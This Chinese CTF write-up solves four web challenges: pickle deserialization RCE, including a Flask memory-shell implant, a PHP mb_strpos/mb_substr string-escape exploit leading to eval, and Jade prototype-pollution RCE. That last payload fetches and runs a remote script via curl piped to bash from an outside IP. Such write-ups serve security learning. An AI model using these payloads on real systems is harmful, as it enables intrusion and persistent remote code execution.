黄河流域公安院校挑战赛WEB部分-gxngxngxn
myfavorPython
pickle反序列话,开启debug,用报错
import os
import pickle
import base64
class A():def __reduce__(self):return (exec,("raise Exception(__import__('os').popen('cat flag.txt').read())",))a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))
Python-reverse
import os
import pickle
import base64
class A():def __reduce__(self):return (exec,("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('gxngxngxn')).read()",))a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))
打了以后随便访问一个404页面,然后执行命令即可
具体分析看我flask内存马那篇文章
https://www.cnblogs.com/gxngxngxn/p/18181936
逃跑大师
mb_strpos与mb_substr执行差异导致的漏洞,参考
https://www.sonarsource.com/blog/joomla-multiple-xss-vulnerabilities/
原理很简单,就是利用mb_strpos与mb_substr这两个函数对某些不可见字符的解析差异导致的
我们本地搭建个环境试验一下:
<?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");echo $start.'<br>';$end = mb_strpos($data, "]");echo $end;return mb_substr($data, $start, $end + 1 - $start);
}
$key = substrstr($_GET[0]."[welcome".$_GET[1]."sdpcsec]");
echo $key;
这里我们正常传个字符可以看到,这个函数会截区[]里面包裹的内容
增加逃逸出一个字符(抽象的mb_strpos)
但是当我们传入%9f时,
可以看到现在截取的就不一样了,竟然后面少了一个字符,前面多了一个字符,我们可以看到start和end的值为0和15
就是说mb_strpos这个函数在遇到%9f这个不可见字符时,会自动忽略,而mb_substr则不会忽略,导致截断的字符串往前移动了一个位置。
减少逃逸出三个字符(神奇的mb_substr)
再来看%f0两个函数是怎么识别的
可以看到mb_strpos函数是正常当成一个字符识别,但是mb_substr就很神奇了,他会把%f0连着后面的三个字符当成一个字符来识别,所以可以看到这里明显是少了三个字符
构造任意字符
那么简单来说就是%9f用来增加一个字符,%f0用来减少三个字符,我们利用这个特性,可以实现任意字符的构造,如下:
成功构造出gxngxngxn,这里是%f0和%9f配合使用
也可以单独使用%9f来实现逃逸
解题
接下来回归题目本身
<?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");$end = mb_strpos($data, "]");return mb_substr($data, $start, $end + 1 - $start);
}
class A{public $A;public $B = "HELLO";public $C = "!!!";public function __construct($A){$this->A = $A;}public function __destruct(){$key = substrstr($this->B . "[welcome sdpcsec" .$this->C . "]");echo $key;eval($key);}
}
if(isset($_POST['escape'])) {$Class = new A($_POST['escape']);$Key = serialize($Class);$K = str_replace("SDPCSEC", "SanDieg0", $Key);unserialize($K);
}
else{echo "nonono";
}
这里就是利用了这个原理来构造出任意代码执行,套了一个反序列化字符串逃逸,无伤大雅
直接放我的exp脚本:
import os
import re
import requests
#编码
def encode(string):encode_string = ""for char in string:encode_char = hex(ord(char)).replace("0x","%") #先转ASCII编码再转16进制,把0x替换为%# 例如 i+=1 == i=i+1;所以 encode_string = encode_string + encode_charencode_string += encode_char # encode_string += 空字符+结果return encode_string
#exp
def payload(cmd):print("url加密:"+encode(cmd))# 请用url全加密后的cmd替换原来的cmd!!!cmd1=""for i in range(len(cmd)):cmd1 += "$"cmd = cmd1 + cmds = len(cmd)payload1 = '";s:1:"B";s:' + str(s) + ':"' + cmd + '";s:1:"C";s:9:"gxngxngxn";}'payload2 = ""for i in range(len(payload1)):payload2 += 'SDPCSEC'payload2 = payload2 + payload1payload2 = payload2.replace("$", "%9f")print(payload2)exp=payload('system("cat /flag");//')
将得到字符串中的命令用url全加密后替换即可
Ezzz_Proto
const express = require('express');
const lodash = require('lodash');
const path = require('path');
var bodyParser = require('body-parser');const app = express();
var router = express.Router();app.set('view engine', 'jade');
app.set('views', path.join(__dirname, 'views'));
app.use(bodyParser.json({ extended: true }));app.get('/',function (req, res) {res.send('Hello World');
})app.post('/post',function (req, res) {function merge(target, source) {for (let key in source) {if (key in source && key in target) {merge(target[key], source[key])} else {target[key] = source[key]}}}var malicious_payload = JSON.stringify(req.body);var body = JSON.parse(JSON.stringify(req.body));var a = {};merge(a, JSON.parse(malicious_payload));console.log(a.name);res.render('index.jade', {title: 'HTML',name: a.name || ''});
})
app.listen(1113, () => console.log('Example app listening on port http://127.0.0.1:1113 !'))
看到引入了jade模板,并且/post路由存在明显的原型链污染,很明显是两个结合打jade模板引擎rce
参考文章:
https://www.anquanke.com/post/id/236354/
利用原文中的exp打打,发现不行,于是跟进底层断点调试
发现在此处将visit换成了visitCode,跟进visitCode函数里
发现这里也存在明显的拼接污染,可以rce,只要污染code.buffer为true,val处拼接我们命令执行的代码即可
payload:
{"__proto__":{"compileDebug":true,"self":true,"buffer":1,"val":"global.process.mainModule.constructor._load('child_process').execSync('curl http://81.70.252.29/1.txt|bash')"}}